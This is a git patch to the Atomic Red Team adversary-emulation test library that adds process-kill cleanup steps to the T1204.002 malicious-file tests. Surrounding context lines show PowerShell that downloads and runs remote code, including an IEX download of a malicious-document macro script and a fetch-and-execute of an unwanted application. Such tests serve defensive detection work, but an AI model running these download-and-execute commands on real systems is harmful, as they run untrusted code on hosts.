From 52a09fad88fcf0527ec745484be38bbad7823ea0 Mon Sep 17 00:00:00 2001
From: Carrie Roberts <clr2of8@gmail.com>
Date: Fri, 14 Jan 2022 20:56:22 -0600
Subject: [PATCH] issue #1705 updates (#1723)

issue #1705 updates
---
 atomics/T1204.002/T1204.002.yaml | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml
index 934d8f7e..de27b9aa 100644
--- a/atomics/T1204.002/T1204.002.yaml
+++ b/atomics/T1204.002/T1204.002.yaml
@@ -293,6 +293,8 @@ atomic_tests:
         IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
         Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
     name: powershell
+    cleanup_command: |
+      Stop-Process -name mshta
 - name: Potentially Unwanted Applications (PUA)
   auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295
   description: |
@@ -315,6 +317,7 @@ atomic_tests:
       Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
       & "#{pua_file}"
     cleanup_command: |
+      Stop-Process -name PotentiallyUnwanted
       Remove-Item #{pua_file} -ErrorAction Ignore
 - name: Office Generic Payload Download
   auto_generated_guid: 5202ee05-c420-4148-bf5e-fd7f7d24850c